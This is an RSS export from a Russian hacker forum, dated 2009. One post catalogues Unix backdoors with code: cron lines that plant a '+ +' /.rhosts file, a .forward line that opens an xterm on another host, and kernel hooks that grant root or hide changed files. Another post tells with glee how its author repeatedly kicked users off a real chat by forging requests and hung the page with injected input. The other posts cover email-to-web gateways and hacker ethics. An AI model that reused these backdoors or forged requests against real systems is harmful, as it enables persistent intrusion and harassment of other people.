<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://hackzona.youbb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Форум хакеров!!!</title>
		<link>http://hackzona.youbb.ru/</link>
		<description>Форум хакеров!!!</description>
		<language>ru-ru</language>
		<lastBuildDate>Wed, 05 Aug 2009 14:19:22 +0400</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Задняя дверь</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=41#p41</link>
			<description>&lt;p&gt;&amp;quot;Мертвый компьютер - защищенный компьютер!&amp;quot;&lt;/p&gt;
						&lt;p&gt;Введение.&lt;/p&gt;
						&lt;p&gt;Проникнуть в чужую систему и добиться там root привелегий это еще полдела. Как и в&lt;br /&gt;известной игре в &amp;quot;Царя горы&amp;quot;, завоеванное нужно удержать. Для этого в систему вносятся&lt;br /&gt;небольшие изменения, оставляются программы. Это и есть backdoors. Чтобы найти их в&lt;br /&gt;своей системе ( А вдруг они там уже есть?! ;-), необходимо понимать способы их&lt;br /&gt;создания. В этом документе я не претендую на описание всех возможных backdoors. Вы&lt;br /&gt;можете предложить свой способ и пополнить коллекцию. Все названия относятся к OS&lt;br /&gt;Solaris. В других *NIX системах они аналогичны.&lt;/p&gt;
						&lt;p&gt;Классификация.&lt;/p&gt;
						&lt;p&gt;Backdoors, дающие привилегии.&lt;/p&gt;
						&lt;p&gt;Изменение атрибутов файлов.&lt;/p&gt;
						&lt;p&gt;suid-bit (04000). При запуске программы, имеющей s бит система порождает процесс с&lt;br /&gt;эффективным uid равным uid хозяина программы. Таким образом, копия shell, лежащая в&lt;br /&gt;удаленном каталоге и имеющая sticky-bit, дает мгновенные права &amp;quot;хозяина&amp;quot; файла,&lt;br /&gt;например root.&lt;/p&gt;
						&lt;p&gt;Атрибуты специальных устройств.&lt;/p&gt;
						&lt;p&gt;/dev/mem указывает на драйвер для доступа к памяти. Постановка на него атрибутов 0666&lt;br /&gt;дает пользователю возможность прямой записи в память. Злоумышленник может найти proc_t&lt;br /&gt;структуру своего процесса и изменить его эффективный uid. {kmem_thief}&lt;/p&gt;
						&lt;p&gt;Изменение системных файлов.&lt;/p&gt;
						&lt;p&gt;/var/spool/cron/crontabs/ Cron создает заказанные процессы в установленное время.&lt;br /&gt;Взломщик может добавить строку, создающую, например, .rhosts файл в полночь и&lt;br /&gt;уничтожающую его утром в файл заданий root.&lt;/p&gt;
						&lt;p&gt;/var/spool/cron/crontabs/root:&lt;br /&gt;0 22 * * 6 &amp;quot;echo &#039;+ +&#039; &amp;gt; /.rhosts&amp;quot;&lt;br /&gt;0 6 * * 1 &amp;quot;rm -rf /.rhosts&amp;quot;&lt;/p&gt;
						&lt;p&gt;/etc/passwd, /etc/shadow - в этих файлах храниться информация о аккаунтах. Взломщик&lt;br /&gt;может добавть в них свои записи или изменить аттрибуты этих файлов для внесения в&lt;br /&gt;произвольный момент своей информации.&lt;/p&gt;
						&lt;p&gt;/var/sadm/install/contents - этот файл хранит информацию о проинсталлированных в&lt;br /&gt;системе файлах, их размеры, атрибуты и контрольную сумму. Этот файл может быть изменен&lt;br /&gt;для сокрытия модификации программ.&lt;/p&gt;
						&lt;p&gt;Подмена программ, модификация библиотек.&lt;/p&gt;
						&lt;p&gt;Программы, имеющие sticky-bit или часто выполняемые администратором системы могут быть&lt;br /&gt;модифицированны для внесения изменений в систему при выполнении администратором. E.g:&lt;br /&gt;....&lt;br /&gt;if( !geteuid())&lt;br /&gt;chmod(&amp;quot;/var/tmp/.hidden_shell&amp;quot;, 0x4555);&lt;br /&gt;....&lt;/p&gt;
						&lt;p&gt;Аналогичный кусочек может быть вставлен в одну библиотек, например libc. Библиотека&lt;br /&gt;libc.a разбирается на обьектные файлы. Необходимая функция модифицируется и&lt;br /&gt;компилируется новая динамическая библиотека.&lt;/p&gt;
						&lt;p&gt;Добавление модулей в ядро.&lt;/p&gt;
						&lt;p&gt;Взломщик может добавить свой модуль в ядро и перехватить какой-либо из системных&lt;br /&gt;вызовов, скажем, SYS_setuid.&lt;br /&gt;SYS_setuid Solaris 2.6&lt;br /&gt;....&lt;br /&gt;proc_t p;&lt;br /&gt;user_t ut;&lt;br /&gt;int my_setuid(uid_t uid)&lt;br /&gt;{&lt;br /&gt;int rval;&lt;/p&gt;
						&lt;p&gt;p = ttoproc(curthread);&lt;br /&gt;mutex_enter(&amp;amp;p-&amp;gt;p_lock);&lt;br /&gt;up = prumap(p);&lt;br /&gt;rval = bcmp(up-&amp;gt;u_comm, &amp;quot;devil&amp;quot;, 5);&lt;br /&gt;(void)prunmap(p);&lt;br /&gt;mutex_exit(&amp;amp;p-&amp;gt;p_lock);&lt;br /&gt;if( rval) {&lt;br /&gt;rval = setuid(uid);&lt;br /&gt;} else {&lt;br /&gt;...&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;....&lt;/p&gt;
						&lt;p&gt;Теперь достаточно переименовать свою программу в devil* и вызвать setuid для получения&lt;br /&gt;uid = 0.&lt;/p&gt;
						&lt;p&gt;Специально оставленные программы.&lt;/p&gt;
						&lt;p&gt;В системе могут быть оcтавлены файлы, такие как passwd крекеры, exploits для suid&lt;br /&gt;программ, etc. На не пропатченной системе с помощью exploitов могут быть получены root&lt;br /&gt;привелегии за счет выполнения кода в стеке программ имеющих sticky-bit.&lt;/p&gt;
						&lt;p&gt;Backdoors, дающие доступ к системе.&lt;/p&gt;
						&lt;p&gt;Введение доверенных отношений&lt;/p&gt;
						&lt;p&gt;~user/.rhosts, /etc/host.equiv, ~user/.shosts (при установленном SSH) Эти файлы&lt;br /&gt;создают доверенные отношения в сети. К ним обращаются демоны in.rlogind, in.rshd,&lt;br /&gt;sshd, etc. В файлах оговорены пары компьютер-пользователь которые могут входить в&lt;br /&gt;систему минуя схему аутенфикации. Пара &#039;+ +&#039; позволяет вход любого пользователя с&lt;br /&gt;любого компьютера без пароля. Наличие файла /.rhosts {+ +} предоставляет возможность&lt;br /&gt;войди в систему как root или smtp (uid=0, gid=0). Ограничение на вход пользователя&lt;br /&gt;root только с консоли не запрещает удаленный вход пользователя smtp, a&lt;br /&gt;/usr/bin/.rhosts дает вход для пользователя &#039;bin&#039;&lt;/p&gt;
						&lt;p&gt;~user/.forward в этом файле хранится информация для перенаправления почты. Он может&lt;br /&gt;выглядеть например так:&lt;br /&gt;\user&lt;br /&gt;|&amp;quot;/usr/openwin/bin/xterm -display another.host.net:0&amp;quot;&lt;/p&gt;
						&lt;p&gt;Добавление или модификация демонов.&lt;/p&gt;
						&lt;p&gt;Системные демоны обычно запускаются при старте системы из /etc/rc?.d/ файлов или при&lt;br /&gt;помощи мета-демона inetd. В эти файлы можно добавить старт своего демона. Для&lt;br /&gt;затруднения обнаружения посторонних соединений путем прослушивания сети или обмана&lt;br /&gt;firewalla чужая программа может использоваться UDP протокол или ICMP пакеты.&lt;/p&gt;
						&lt;p&gt;Backdoors, маскирующие активность в системе.&lt;/p&gt;
						&lt;p&gt;Подмена программ.&lt;/p&gt;
						&lt;p&gt;Замена программ исправленными версиями используется для маскировки своей работы в&lt;br /&gt;системе, например, запуска ломалки паролей. Программы изменяются так что бы не&lt;br /&gt;показывать активность определенного пользователя, запускаемых им процессов,&lt;br /&gt;использование дискового пространства. Наиболее известным из пакетов программ для&lt;br /&gt;замены системных утилит является RootKit. {RootKit SunOS, RootKit Linux}&lt;/p&gt;
						&lt;p&gt;Введение модулей в ядро.&lt;/p&gt;
						&lt;p&gt;Модули могут перехватывать системные вызовы обращения к файлам, получения информации о&lt;br /&gt;системе и сознательно искажать получаемую информацию. Например, при открытии файла&lt;br /&gt;&amp;quot;/etc/inetd.conf&amp;quot; будет происходить открытие резервной копии этого файла спрятанной в&lt;br /&gt;системе. Таким образом скрывается изменение системных файлов. SYS_open:&lt;br /&gt;SYS_open Solaris 2.6&lt;br /&gt;...&lt;br /&gt;static char new_path = &amp;quot;/var/tmp/.locks/.idx/inetd.conf&amp;quot;;&lt;br /&gt;int my_open(char *fname, int fmode, int cmode)&lt;br /&gt;{&lt;br /&gt;int rval;&lt;/p&gt;
						&lt;p&gt;rval = bcmp(fname, &amp;quot;/etc/inetd.conf&amp;quot;, 16);&lt;br /&gt;if( rval) {&lt;br /&gt;return(copen(fname, (int)(fmode-FOPEN), cmode));&lt;br /&gt;} else {&lt;br /&gt;return(copen(new_path, (int)(fmode-FOPEN), cmode));&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;...&lt;/p&gt;
						&lt;p&gt;Определение backdoors.&lt;/p&gt;
						&lt;p&gt;Хорошо спрятанный backdoor довольно трудно найти. Вопросы поиска и создания backdoors&lt;br /&gt;напоминают &amp;quot;спор брони и снаряда&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Проверка файлов.&lt;/p&gt;
						&lt;p&gt;Разумным решением является сделать назависимый список системных файлов с их атрибутами&lt;br /&gt;и контрольными суммами. Этот список создается после инсталляции новой системы и&lt;br /&gt;корректировки ее с помощью aset (SUNWast) или &#039;fix-modes&#039; by Casper Dik. Проверка&lt;br /&gt;файлов в системе можно производить по cron или постоянным процессом с низким&lt;br /&gt;приоритетом. Контрольные суммы вычисляемые /bin/sum не являются надежной гарантией&lt;br /&gt;безопасности, т.к. легко подбираются. Можно порекомедовать для этих целей MD5.&lt;br /&gt;Существует ряд продуктов различных фирм, позволяющих просматривать систему на предмет&lt;br /&gt;&amp;quot;странных&amp;quot; файлов, дат, атрибутов.&lt;/p&gt;
						&lt;p&gt;Контроль сетевых соединений.&lt;/p&gt;
						&lt;p&gt;Узнать о постороннем доступе в систему можно контролируя сетевой траффик и сканнируя&lt;br /&gt;хосты на предмет открытых портов. Существует большое количество как сканеров так и&lt;br /&gt;систем контроля за сетевым траффиком. Лучшим решением всегда остается firewall ;-).&lt;/p&gt;
						&lt;p&gt;Поддержание системы в разумном порядке.&lt;/p&gt;
						&lt;p&gt;Системы со всеми инсталлированными патчами, отключенными неиспользуемыми сервисами&lt;br /&gt;существенно меньше подвержены разрушению, с разумно ограниченным доверием ;-)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 14:19:22 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=41#p41</guid>
		</item>
		<item>
			<title>Дыры в Чатах</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=40#p40</link>
			<description>&lt;p&gt;Навеяно статьей про то, как чаты поломали... Хотя действительно чат ломать - пара пустяков, но смотря какой чат еще... :-)))&lt;/p&gt;
						&lt;p&gt;1. Дырка в чате &lt;a href=&quot;http://chat.chuvashia.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://chat.chuvashia.com&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;В общем бываю я иногда (редко очень :-((, но все ж заглядываю) на чате &amp;quot;Город над Волгой&amp;quot; (&lt;a href=&quot;http://chat.chuvashia.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://chat.chuvashia.com&lt;/a&gt;). Физически находится в Чебоксарах - мой родной город, так что сами понимаете, иногда ностальгия начинает мучить, так что сил нет терпеть, просто приходишь туда и с земляками (больше с землячками конечно :-)), а их там много) душу просто отводишь...&lt;br /&gt;Ну вот значит... Залазим на чат под ником nick... Ага... залезли... Смотрим на нижний фреймик... Сохраняем его у себя и внимательно наблюдаем...&lt;/p&gt;
						&lt;p&gt;Первый прикол.&lt;br /&gt;Смотрим на вторую форму... Дальше будут сокращенные цитаты:&lt;/p&gt;
						&lt;p&gt;&amp;lt;form method=&amp;quot;POST&amp;quot; action=&amp;quot;mainprog.pl&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;action&amp;quot; value=&amp;quot;logof&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;username&amp;quot; value=nick&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;userid&amp;quot; value=7134NICK8817&amp;gt;&lt;br /&gt;&amp;lt;input src=&amp;quot;exit.GIF&amp;quot; border=&amp;quot;0&amp;quot; name=&amp;quot;exit&amp;quot; width=&amp;quot;80&amp;quot; height=&amp;quot;30&amp;quot; alt=&amp;quot;EXIT!&amp;quot; type=&amp;quot;image&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;/p&gt;
						&lt;p&gt;ага... все ясно... Так, заменяем на следующую конструкцию&lt;/p&gt;
						&lt;p&gt;&amp;lt;form method=&amp;quot;POST&amp;quot; action=&amp;quot;http://chat.chuvashia.com/mainprog.pl&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;edit&amp;quot; name=&amp;quot;action&amp;quot; value=&amp;quot;logof&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;edit&amp;quot; name=&amp;quot;username&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=submit&amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;/p&gt;
						&lt;p&gt;Заметили 10 отличий? :-))). Ну что... Пробуем ввести имя того, кто в чате сидит, например, &amp;quot;ibz&amp;quot;... Жмем кнопку... Ой... ibz ушел... Странно... опять зашел, еще раз повторили операцию... Ой... Опять ушел... Все... работает значит :-))))&lt;br /&gt;Сам в это время в чате болтаю, с девчонкой одной... Назовем ее Земфира...&lt;br /&gt;nick: Земфира ты фокусы любишь?&lt;br /&gt;Земфира: люблю :-)))&lt;br /&gt;nick: А есть щас в чате, кто тебя чем-нибудь обидел?&lt;br /&gt;Земфира: Зидан&lt;br /&gt;nick: зидан, говоришь?&lt;/p&gt;
						&lt;p&gt;А сам в это время его убиваю :-)))&lt;br /&gt;nick: ой, смотри, чо-то он вылетел :-)))?&lt;br /&gt;Земфира: :-)), я уж подумала что это ты :-))))&lt;/p&gt;
						&lt;p&gt;Зидан в это время еще раз заходит, и я его еще раз выкидываю...&lt;br /&gt;nick: да нет, что ты, как я могу это сделать, это ж только админы&lt;br /&gt;могут, да и то, зидан же админ, его выкинуть нельзя :-)))?&lt;/p&gt;
						&lt;p&gt;Зидан заходит еще раз и еще раз, и все так же вылетает&lt;br /&gt;Земфира: Да нет! это ты! Классно, я тоже так хочу! :-))))&lt;/p&gt;
						&lt;p&gt;Пока я ей обьяснял, что да как, зидан так и не появился... Видать комп перегружал бедолага :-)))). Ага вот он снова появился... Тут мне конечно нужно было остановится, но раз уж взял заказ, то выполняй его до конца... В общем бедный зидан пробовал влезать в чат, успевал бросить одну фразу (или не успевал, зависело от моей реакции :-))) и сразу же вылетал еще раз 15 наверно... Ну потом они конечно догадались, выкинули ту девчонку, я выкинул того, кто ее выкинул, меня тоже выкинули... В общем было весело. Мне прикрыли ип - я залез через проксю - посмотрел, что там творится - а там трупы, трупы... зидан озверел, понял наконец, что произошло и просто всех подряд убивал :-))) Вечеринка удалась :-)))))&lt;/p&gt;
						&lt;p&gt;Мораль...&lt;br /&gt;Ошибка у них (создателей чата) была в том, что они при action=logof не проверяли userid (а это уникальный параметр, присваивается каждому входящему свой, случайным образом), и выкидывали сразу по одному только username.&lt;br /&gt;Эта ошибка сразу же была пофиксена, поэтому на этом чате ее не ищите, ищите на других - наверняка она у многих встречается, не на всех чатах, например, уникальными userid пользуются... У многих все гораздо проще :-))))&lt;/p&gt;
						&lt;p&gt;Второй прикол...&lt;br /&gt;Смотрим теперь на первую форму :-)))) Надо сказать, что тэги в этом чате запрещены, и поэтому особо не побалуешься... Шрифт не поменяешь, размер не увеличишь... Обидно... Но не страшно... иба как говорится на каждую отвертку есть труба с лабиринтом (звучит не так конечно, но матом мы ругаться не будем :-))))&lt;br /&gt;Смотрим на первую форму... оля-ля-ля... сколько параметров, некоторые и не используются... О... кажется нашли что надо... среди прочих там есть и такой:&lt;/p&gt;
						&lt;p&gt;&amp;lt;select name=&amp;quot;colname&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;option selected value=White style=&amp;quot;color: White&amp;quot;&amp;gt;White&amp;lt;/option&amp;gt;&lt;br /&gt;&amp;lt;option value=&amp;quot;#F0F8FF&amp;quot; style=&amp;quot;color: #F0F8FF&amp;quot;&amp;gt;Aliceblue&amp;lt;/option&amp;gt;&lt;br /&gt;... и т.д.&lt;br /&gt;&amp;lt;option value=&amp;quot;#9ACD32&amp;quot; style=&amp;quot;color: #9ACD32&amp;quot;&amp;gt;Yellowgreen&amp;lt;/option&amp;gt;&lt;br /&gt;&amp;lt;/select&amp;gt;&lt;br /&gt;Быстренько меняем эту конструкцию на свою:&lt;/p&gt;
						&lt;p&gt;&amp;lt;input type=edit name=&amp;quot;colname&amp;quot;&amp;gt;&lt;/p&gt;
						&lt;p&gt;Так... сделали то что нужно... открываем то что получилось. и в нашем поле вводим следующее:&lt;/p&gt;
						&lt;p&gt;red Face=Arial Size=6&lt;/p&gt;
						&lt;p&gt;кто догадался - это мы тэг &amp;lt;FONT&amp;gt; просто своими параметрами дополнили :-)))) Набиваем и отправляем свой текст - оп-па... Большая жирная красная надпись :-))) (И смачный шлепок от админов за ваши баловства :-)))))&lt;/p&gt;
						&lt;p&gt;Ну вот, теперь мы крутые, как админы можем красиво писать :-)). Теперь другая фишечка... а не попробовать ли нам поставить вот так вот&lt;/p&gt;
						&lt;p&gt;&amp;quot;&lt;/p&gt;
						&lt;p&gt;Правильно, правильно догадались. Ставим и что получаем в итоге? Страничка с сообщениями &amp;quot;повисает&amp;quot;, и не думай что это у тебя одного так :-)))) У всех виснет... Дело в том, что там яваскриптик стоит, а он как раз на этой &amp;quot; спотыкается, возникает ошибка, и страничка дальше не грузится... по крайней мере у многих... :-))) НУ что... гадость это конечно порядочная, но что поделать - аляфер ком аляфер как говорится :-))) Можно конечно утонченней сделать - послать такое сообщение в приват врагу и он лишается привата на некоторое (иногда даже очень длительное :-)))) время.&lt;br /&gt;Ну что значит, рассказал я одному знакомому значит, он и побаловался немножко :-)))). В общем чат на ремонте у них сейчас :-))))&lt;/p&gt;
						&lt;p&gt;Мораль...&lt;br /&gt;Ошибка у них в том что:&lt;br /&gt;первое - они не проверяли то, что именно приходит по параметру colname&lt;br /&gt;второе - они не конвертили &amp;quot; в &amp;quot; (хотя даже если б и конвертили - все равно неправильно было бы :-)))). Ладно хоть догадались &amp;gt; и &lt;br /&gt;&amp;amp;rt убирать... а то сами понимаете:&lt;br /&gt;&amp;amp;rt&amp;lt; дальше любой тэг, и пиши пропало... :-))))&lt;/p&gt;
						&lt;p&gt;Еще раз повторюсь, эти ошибки убрали уже (они старую версию чата вроде загрузили - может и ее заодно проверить думаю?)&lt;br /&gt;Автор: IbZ&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 14:18:12 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=40#p40</guid>
		</item>
		<item>
			<title>Доступ в Интернет через электронную почту</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=39#p39</link>
			<description>&lt;p&gt;Некоторые пользователи сети Интернет вынуждены по разным причинам работать преимущественно с е-майлом. Деньги там экономят на &amp;quot;Волгу&amp;quot; или что ещё, но сидят они на е-майле и ни в какую... Из-за этого они впадают в депрессию, потому что невозможно-де ходить по интернету и пучеглазить на сайты, и это состояние отрицательно сказывается на их здоровье и трудовых успехах. Или ещё хлеще - они не спят по ночам, стараясь попасть в &amp;quot;дешёвое&amp;quot; время из-за пары-другой каких-нибудь левых сайтов. Сами понимаете, что это никак не назовёшь хорошей жизнью. Я и сам был в такой ситуации (да и сейчас в ней нахожусь - сижу в основном, на е-майле) и знаю отлично, к чему это приводит - а ни к чему хорошему. Нервы сдают, жизнь ломается, рука всё время тянется к кошельку достать денежки и купить нормальный неограниченный доступ в интернет или там интернет-карту... На пиво не остаётся, и поэтому кайф от интернета, само собой, ломается...&lt;br /&gt;Оказывается, эта трудность легко поправима. Можно получать любые страницы интернета на свой почтовый ящик по какому-нибудь дешёвому &amp;quot;безинтернетному&amp;quot;, е-майловому доступу, а на сэкономленные денежки попивать пивко!&lt;br /&gt;Попробовав различные буржуйские серверы, предлагающие бесплатно эти услуги, я остановился на этих вот. И Вам рекомендую их тоже.&lt;br /&gt;cерверы PageGetter&lt;br /&gt;В графе &amp;quot;куда&amp;quot; - адрес (см. ниже)&lt;br /&gt;В графе &amp;quot;тема&amp;quot; - пустота&lt;br /&gt;В самом письме пишете адрес странички (лучше с http://...), ну например: &lt;a href=&quot;http://www.apatity.mels.ru/~itravine&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.apatity.mels.ru/~itravine&lt;/a&gt;&lt;br /&gt;Заказывать можно не одну, а сразу несколько страничек за раз. Адрес каждой странички - на отдельной строчке.&lt;br /&gt;Отправляете это письмо на любой из нижних е-майловых адресов (пишем их в графу &amp;quot;куда&amp;quot;)&lt;br /&gt;text@PageGetter.com- приходит страничка в виде текстовой вырезки, без картинок и цветных фонов. Все ссылки сохранены. Русский язык и кодировки поддерживаются. &lt;br /&gt;Надо пойти по ссылочке - копируем ярлык, вставляем в новое письмо и посылаем опять на этот сервер. Этот сервер хорош, когда важнее не картинки (всякая рекламная ерунда или надоедливые баннеры, например), а именно текст. Я часто пользуюсь именно этим сервером.&lt;br /&gt;web@PageGetter.com- приходит страничка с текстом, картинками, фонами. Со всем, чем её напичкали буржуи или там наши отечественные трудяги Интернета... &lt;br /&gt;По ссылке идём по другому - жмём на ссылку и почт-программа формирует письмецо, где сама пропишет всё что нужно.&lt;br /&gt;HTML@PageGetter.com- приходит страничка с цветным фоном, корректной расстановкой текста/баннеров/картинок/заставок/таблиц по полю, но без этих самых картинок. Очень удобно. Похоже на работу серверов группы www4mail , только ждать приходится меньше и &amp;quot;раскрывать&amp;quot; отдельно не надо. Работаем с ссылками аналогично, как и с web@PageGetter.com... &lt;br /&gt;Вот если совсем всё равно, какие там фоны или ненужные фотки на страничке висят, а важен только лишь текст, то, действительно, я рекомендую text@PageGetter.com, т.к. текст-то приходит полностью, а разница в размере полученной странички может изменяться в десятки раз по сравнении с полученной от web@PageGetter.com. Ну а если там какие таблицы висят или в общем охота посмотреть, как страничка выглядит, но опять же наплевать на картинки - то HTML@PageGetter.com. А если всё же охота на картинки/баннеры посмотреть - web@PageGetter.com.&lt;br /&gt;Так как сейчас буржуи-владельцы этих серверов захотели поправить своё финасовое положение, то хочу предупредить, что отсылают они сейчас странички с лимитом - 40 страничек в месяц или 10 Мь на один е-майл. Это просто кошмар и я однажды съел всю квоту за один день. Кстати, съел я её, пользуясь text@PageGetter. Так что учтите: квота одна на все эти серверы.&lt;br /&gt;Как обойти эту квоту я не знаю. Можно зайти с другого ящика и получить ещё 40 страничек на мыло, но это не выход в большинстве случаев. Да ещё буржуи вздумали иногда дублировать запрос и слать по две заказанных странички. Конечно, это дважды увеличивает расходы по квоте...&lt;br /&gt;А можно вспомнить сервера &lt;br /&gt;www4mail &lt;br /&gt;Они позволяют получать странички и качать картинки и небольшие программы и архивы из сети. Тоже неплохо. Также они позволяют заполнять онлайн-формы и отсылать их на обработку. Например, я не выхожу в &amp;quot;дорогой&amp;quot; интернет, чтобы написать что-либо в чьей-либо гостевой или чтобы заполнить форму на &amp;quot;халяву&amp;quot;.&lt;br /&gt;Итак, эти сервера. Начнём хотя бы с этих:&lt;br /&gt;www4mail@web.bellanet.org&lt;br /&gt;www4mail@wm.ictp.trieste.it -идеально подходит для получения картинок! &lt;br /&gt;www4mail@ftp.uni-stuttgart.de -хорош для получения текстовой информации, работает очень быстро. &lt;br /&gt;www4mail@access.bellanet.org -позволяет заполнять онлайн-формы! &lt;br /&gt;www4mail@collaborium.org -позволяет заполнять онлайн-формы! &lt;br /&gt;Все они имеют квоты, но они не столь жестоки, как у предыдущих серверов и кажинный раз Вам сообщают, сколько у Вас чего осталось.&lt;br /&gt;Высылаете письмо на сервер, в теле пишете адрес странички ( с http://) и получаете ответное письмо с прикреплённым документом в виде той самой странички. Картинок нет. Все ссылки и ссылки на картинки заменены на квадратики, ставите &amp;quot;галочку&amp;quot; - жмёте большую клавишу внизу текста на экране - программа сама формирует ответное письмо на этот сервер и размещает его в &amp;quot;Выходящей&amp;quot; папке почтовой программы. Нельзя за один такой раз &amp;quot;галочить&amp;quot; больше пяти ссылок. Можно очистить квадратики маленькой клавишей внизу и загалочить ещё. &lt;br /&gt;Обычно выскакивает (у меня, например) информация, что сейчас-де будет сформировано письмо для работы по почте. И спрашивает, продолжать или нет. Жмём &amp;quot;продолжать&amp;quot; - &amp;quot;да&amp;quot;.&lt;br /&gt;Совет: ставьте &amp;quot;работать автономно&amp;quot;-&amp;quot;offline&amp;quot; перед этими действиями, а то можно завесить почт-программу. На каждый запрос &amp;quot;посылать письмо?&amp;quot; отвечаем отрицательно. Шлём только стандартным способом почт-программы.&lt;br /&gt;Таким образом можно получать как картинки, так и программы и архивы до 300 Кь.&lt;br /&gt;Сервера www4mail@collaborium.org / www4mail@access.bellanet.org позволяют заполнять онлайн-формы (например, на &amp;quot;халяву&amp;quot;) и оставлять сообщения в гостевых книгах на любом сервере. &lt;br /&gt;Я думаю, что всё равно, это просто замечательно подойдёт любому &amp;quot;ограниченному&amp;quot; интернетчику.&lt;br /&gt;Пример посылки смс на сев-зап по е-майлу с использованием веб-сервиса.&lt;br /&gt;Итак, надо позарез послать смс-ку нужному человеку на мобилу… А вот в инет не выйти, чтобы оттуда послать… Только почта и есть, например… Эх, была-не была… пойду куплю карту, и законнектюсь... СТОП! Можно и по почте. Да так ещё и дешевле может выйти… даже чем с самой мобилы…&lt;br /&gt;Итак, шлём письмо на&lt;br /&gt;www4mail@collaborium.org или www4mail@access.bellanet.org и пишем там ссылку: &lt;a href=&quot;http://www.nwgsm.com/sendsms.htm&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.nwgsm.com/sendsms.htm&lt;/a&gt;&lt;br /&gt;Через некоторое время придёт к вам письмо… с прикреплённым файлом, открываете его - опа-на, на экране - форма отправки смс. Если абракадабру кажет - поставьте кодировку кои-8 вручную… Пишете номер мобилы, текст сообщения… жмёте send и формируется письмо на е-майл и само помещается в &amp;quot;исходящих&amp;quot;. Отсылаете почту и через некоторое время - смс у вашего знакомого. Кстати, не забудьте подписаться, потому как смс ему придёт с номера 0001000.&lt;br /&gt;Информация любезно предоставлена Ильёй Травиным&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 14:16:27 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=39#p39</guid>
		</item>
		<item>
			<title>Ваше будущее в качестве хакера</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=38#p38</link>
			<description>&lt;p&gt;— И что это за профессия такая, прости господи! Сын лейтенанта Шмидта, Ну, год еще, ну, два. А дальше что? Дальше ваши рыжие кудри примелькаются, и вас просто начнут бить.&lt;/p&gt;
						&lt;p&gt;— Так что же делать! — забеспокоился Балаганов.&lt;/p&gt;
						&lt;p&gt;— Надо мыслить, — сурово ответил Остап.&lt;/p&gt;
						&lt;p&gt;И. Ильф, Е. Петров. Золотой теленок&lt;/p&gt;
						&lt;p&gt;Многие хакеры и не хакеры излагают свои версии “хакерской этики”, и почти все версии похожи друг на друга. Но часто крутые ребята-хакеры сначала следуют принципам, моральным установкам — Кодексу чести, — а затем их уводит в сторону. Им начинает казаться, что, зная закон, они получают право его нарушать: “Мы не действуем вслепую”. Так поступают крутые ребята — они знают, что они крутые, забывая при этом, что порой даже самые крутые хакеры на поверку оказываются полными тупицами.&lt;/p&gt;
						&lt;p&gt;Я хочу изложить вам свою собственную версию хакерского Кодекса чести. Это список моих убеждений, относящихся к миру компьютеров. Возможно, у вас совсем другие убеждения, но это не страшно — хакеры люди независимые. Впрочем, я хочу, чтобы вы поняли, почему так важно сформулировать кодекс чести и следовать ему. Это может уберечь вас от неприятностей. Я не хочу сказать, что, если вас поймают, суд обратит внимание на то, что вы вели себя в соответствии со своими принципами, особенно если эти принципы включают в себя незаконную деятельность. Я имею в виду, что мне хотелось бы верить в следующее: если вы сформулировали свой моральный кодекс, и если все хакеры из вашего круга подпишут заверения в своей верности этому кодексу, то, быть может, судья или присяжные скажут себе: “Господи, да ведь он не собирался причинять никакого вреда”. Вы, возможно, помните наш разговор об умышленном причинении вреда. Хотелось бы думать, что суд обратит на это внимание, хотя в действительности люди редко пытаются посмотреть на веши с чужой точки зрения. По крайней мере, обладая кодексом чести, вы сможете избавиться от нежелательных людей, и участники вашей группы будут счастливы и в безопасности. Но еще более важно то, что в подобном кодексе, которому вы следуете, присутствует какая-то необъяснимая скрытая ценность. Вам кажется, что я читаю вам проповеди? Ну что ж, я не стану спорить. Вот мой Кодекс Чести Хакера. Здесь мои принципы, касающиеся компьютеров и хакерства, которым я стараюсь следовать.&lt;/p&gt;
						&lt;p&gt;мой кодекс: чести&lt;/p&gt;
						&lt;p&gt;Компьютеры дали возможность каждому получать огромные количества информации быстрее и дешевле, чем когда-либо прежде. Свободное распространение информации является благом, но лишь постольку, поскольку не ущемляет прав человека. Существует два вида прав человека—права отдельной личности и права человечества в целом. Человечество должно иметь возможность виртуального доступа к любой информации, и эта информация должна использоваться в моральных целях.&lt;/p&gt;
